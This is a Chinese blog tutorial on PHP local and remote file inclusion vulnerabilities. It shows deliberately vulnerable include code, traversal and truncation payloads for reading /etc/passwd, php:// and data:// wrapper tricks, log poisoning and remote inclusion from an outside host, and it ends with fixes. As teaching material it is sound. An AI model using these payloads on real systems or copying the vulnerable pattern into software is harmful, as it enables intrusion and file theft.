Web安全之文件包含漏洞

最新推荐文章于 2024-09-11 18:11:29 发布
最新推荐文章于 2024-09-11 18:11:29 发布
阅读量2.8k 收藏 3
点赞数 2
分类专栏: 网络安全 文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37133717/article/details/94631028
版权

什么是文件包含

程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。
例如:include “conn.php”

PHP中常见包含文件函数

  • include()
    当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。
  • include_once()
    功能与Include()相同,区别在于当重复调用同一文件时,程序只调用一次
  • require()
    require()与include()的区别在于require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。
  • require_once()
    功能与require()相同,区别在于当重复调用同一文件时,程序只调用一次。

区别

  • inlude :包含的文件不存在,程序会继续执行
  • require:包含文件不存在,程序停止执行
    (如果出现语法错误,两个不会继续执行,如果是找不到这个文件,include继续执行,require,停止执行)

文件包含漏洞原理
文件包含漏洞产生的原因是在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过。

常见漏洞代码

if(isset($_GET[page])){
	 include $_GET[page];
}else{
	 include "home.php";
}

文件包含漏洞危害

  • 配合文件上传漏洞GetShell
  • 可以执行任意脚本代码
  • 网站源码文件以及配置文件泄露
  • 远程包含GetShell
  • 控制整个网站甚至是服务器

文件包含漏洞的分类

  • 当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
  • 本地文件包含和远程文件包含造成漏洞的原因是一样的,当php.ini 中的配置选项allow_url_fopen和allow_url_include为ON的话,则包含的文件可以是第三方服务器中的文件,这样就形成了远程文件包含漏洞。

本地文件包含利用

  • 上传图片马,包含图片马GetShell
  • 读取网站源码以及配置文件
  • 包含日志文件GetShell

包含上传图片_001

<?php
if(isset($_GET[page])){
	  include($_GET[page]);
}else{
	  include 'show.php';
}
?>

包含上传图片_002

<?php
if(isset($_GET[page])){
	  include('./action/' . $_GET[page]);
}else{
	  include ./action/show.php';
}
?>

包含上传图片_003

<?php
if(isset($_GET[page])){
	 include('./action/'. $_GET[page] . '.php');
}else{
	 include './action/show.php';
}
?>

%00截断

  • /etc/passwd%00
  • 需要 magic_quotes_gpc=off,PHP小于5.3.4有效

路径长度截断

  • /etc/passwd././././././././././././.[…]/././././././././.
  • php版本小于5.2.8可以成功,linux需要文件名长于4096,windows需要长于256

读服务器本地文件

  • ?page=…/…/…/…/…/…/…/etc/passwd

读网站源码文件
index.php?page=php://filter/read=convert.base64-encode/resource=index.php

伪协议:

  • 直接包含木马文件,可以是图片,txt,压缩包…
  • ?page=php://input 接收post请求
    需要开启 仅需要开启 allow_url_include
  • ?page=http://172.18.11.66/0831/1.txt
    需要开启 allow_url_fopen,allow_url_include (远程包含)
  • ?page=php://filter/read=convert.base64-
    encode/resource=main.php (读取文件源码)
  • ?page=data://text/plain,<?php phpinfo();?>
    需要开启allow_url_fopen,allow_url_include

包含日志文件GetShell

  1. 首先 找到日志文件存放位置
  2. 让日志文件插入PHP代码
  3. 包含日志文件

远程文件包含利用
包含远程txt文件(php.ini的配置选项allow_url_fopen和allow_url_include为on),远程服务器上存放一个txt文件,或
者不被解析的php文件。(因为包含的时候返回的是php源代码,所以不能被解析)

index.php?page=http://www.xxx.com/1.txt

漏洞挖掘

  • 没有通用的挖掘办法
  • 特定的CMS,特定的版本可能存在漏洞(include,require)
  • Web漏洞扫描器扫描,常见的web漏洞扫描器都支持可以检测。

修复办法

  • PHP中使用open_basedir配置限制访问在指定的区域
  • 过滤.(点)/(反斜杠)\(反 斜杠)
  • 禁止服务器远程文件包含
    (allow_url_fopen,allow_url_include,off)
刘三羊
关注
专栏目录
文件包含漏洞
forwardss的博客
03-08 1043
文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接用此文件,而无需 再次编写,这种调用文件的过程一般被称为包含。 一、原理和定义 为什么会产生文件包含漏洞? 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正 是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 以php,webapplication 中...
Web安全文件包含漏洞详解
hack0919的博客
04-25 554
PHP文件包含会将一切的文件当成PHP脚本执行
web安全文件包含漏洞
xlsj雪松的博客
05-26 417
大多数Web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,所以包含漏洞经常出现在PHP语言中。 1 PHP文件包含 1.1 原理 PHP中提供了四个文件包含的函数,分别是include()、include_once()、 require()和require_ once()。这四个函数都可以进行文件包含,但作用却不一样,其区别如下: ●require 找不到被包含的文件时会产生致命错误(E COMPILE ERROR),并停止脚本; ●include 找不到被包含的文
【网络安全】-文件包含漏洞-pikachu
最新发布
weixin_65311462的博客
09-11 1868
文件包含漏洞是指程序在执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行使用,从而导致hacker可以利用这个漏洞包含恶意文件,执行任意代码进而访问敏感信息。1.本地文件包含漏洞与远程文件包含漏洞在防范措施上,两者都需要对用户输入进行严格的验证和过滤,但远程文件包含漏洞还需要特别注意禁用相关配置选项和限制外部资源的访问权限。
文件包含漏洞特征详解
有勇气的牛排博客
07-29 856
1 介绍 更多文章:有勇气的牛排 — 攻防 如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含和远程文件包含两种形式。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 2 基础 常见的文件包
文件包含漏洞特点和php封装伪协议
bwxzdjn的博客
04-24 2573
用实验案例的方式介绍文件包含漏洞的成因特点,利用方法。在了解文件包含漏洞的危害的同时学习各类文件的包含、本地包含配合文件上传包含图片马和php封装伪协议。
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
web安全文件上传、文件包含漏洞解析
vivlol918的博客
05-14 1269
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
web安全漏洞入门
04-06
web安全手册。。。。。。。。。。。。。。。。。。。。。。。。。。。
文件包含漏洞概述、特征、利用条件、危害、防御、修复方法
白帽黑客八哥的博客
12-20 2286
文件包含漏洞(File Inclusion Vulnerability)是一种允许攻击者读取服务器上任意文件或目录内容的漏洞,从而可能泄露敏感信息,或允许攻击者构造恶意请求来执行任意代码。这是一个常见且危险的漏洞,在许多编程语言和框架中都可能存在。
文件包含漏洞详解
weixin_53440207的博客
03-10 1003
文件包含漏洞详解
文件包含漏洞全解
2301_78287784的博客
06-15 1049
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
文件包含漏洞全面详解
heike_Ch的博客
04-24 1028
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
文件包含漏洞2 | iwebsec
weixin_52116519的博客
03-12 1288
服务器可以过滤掉执行文件包含操作的符号,例如:\,// 等,以及 php 伪协议常用字符,例如input,output,filter 等,将这些字符进行有效过滤,可以减少恶意文件操作的可能。远程文件包含(remote file include,RFI)是指包含文件的位置并不在本地服务器,而是通过URL的形式包含到其他服务器上的文件,以及执行文件中的恶意代码。:通过可控的session值,传入恶意代码,找到session文件地址、文件名,通过文件包含漏洞包含session文件,达到getshell的目的。
【iwebsec靶场文件包含漏洞个人专用结题记录】(记录自己不了解的知识点)
qq_63761746的博客
03-27 318
为什么会有文件包含漏洞?什么是文件包含漏洞?
理解Web安全文件包含漏洞深度解析
"该文件是关于web安全的专题培训材料,主要探讨了文件包含漏洞这一主题,涵盖了文件包含漏洞的基础知识、利用技巧,以及在JSP、ASPX和PHP环境中的具体表现和利用条件。" 文章正文: 文件包含漏洞Web应用程序安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值